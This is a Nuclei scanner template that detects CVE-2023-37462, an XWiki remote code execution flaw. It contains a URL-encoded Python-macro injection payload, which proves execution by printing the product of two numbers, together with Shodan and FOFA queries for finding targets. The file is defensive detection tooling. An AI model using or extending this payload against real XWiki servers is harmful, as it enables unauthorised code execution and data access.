nuclei-templates/http/cves/2023/CVE-2023-37462.yaml

61 lines
2.8 KiB
YAML
Raw Normal View History

2023-07-21 14:31:16 +00:00
id: CVE-2023-37462
2023-07-22 16:04:47 +00:00
2023-07-21 14:31:16 +00:00
info:
2023-07-22 16:04:47 +00:00
name: XWiki Platform - Remote Code Execution
author: parthmalhotra,pdresearch
2023-08-31 11:46:18 +00:00
severity: high
2023-07-22 16:04:47 +00:00
description: |
XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Improper escaping in the document `SkinsCode.XWikiSkinsSheet` leads to an injection vector from view right on that document to programming rights, or in other words, it is possible to execute arbitrary script macros including Groovy and Python macros that allow remote code execution including unrestricted read and write access to all wiki contents. The attack works by opening a non-existing page with a name crafted to contain a dangerous payload. It is possible to check if an existing installation is vulnerable
2023-09-06 11:43:37 +00:00
remediation: This issue has been patched in XWiki 14.4.8, 14.10.4 and 15.0-rc-1. Users are advised to upgrade.
2023-07-21 14:31:16 +00:00
reference:
- https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29
- https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg
- https://jira.xwiki.org/browse/XWIKI-20457
2023-07-22 16:04:47 +00:00
classification:
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
2023-07-22 16:04:47 +00:00
cve-id: CVE-2023-37462
2023-08-31 11:46:18 +00:00
cwe-id: CWE-74
epss-score: 0.36071
epss-percentile: 0.96676
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
2023-07-21 14:31:16 +00:00
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 2
2023-08-31 11:46:18 +00:00
vendor: xwiki
product: xwiki
2023-09-06 11:43:37 +00:00
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
2023-07-22 16:04:47 +00:00
tags: cve,cve2023,xwiki,rce
2023-07-21 14:31:16 +00:00
http:
- method: GET
path:
2023-07-21 14:33:11 +00:00
- "{{BaseURL}}/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view"
- "{{BaseURL}}/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"
2023-07-21 14:31:16 +00:00
cookie-reuse: true
skip-variables-check: true
2023-08-31 11:46:18 +00:00
2023-07-21 14:31:16 +00:00
extractors:
- type: regex
group: 1
name: id
regex:
2023-07-21 15:17:31 +00:00
- data-xwiki-async-client-id="(.+?)"
internal: true
2023-07-21 14:31:16 +00:00
- type: regex
group: 1
name: url
regex:
2023-07-21 15:17:31 +00:00
- <span class="xwiki-async" data-xwiki-async-id="(.+?)"
internal: true
2023-07-21 14:31:16 +00:00
matchers:
2023-07-21 15:17:31 +00:00
- type: dsl
dsl:
- body_2 == "31557644536232"
2023-07-22 16:04:47 +00:00
- contains(header_2, "text/html")
- status_code_2 == 200
condition: and
# digest: 4a0a00473045022100c26b4e47d1422a585446fb366389e535f4a0275eb537a2589314222b4c2dba1202202128260ac3972d863fba14a1d35c89f5226536a7a3b9956ea59fbb9f110eb9cf:922c64590222798bb761d5b6d8e72950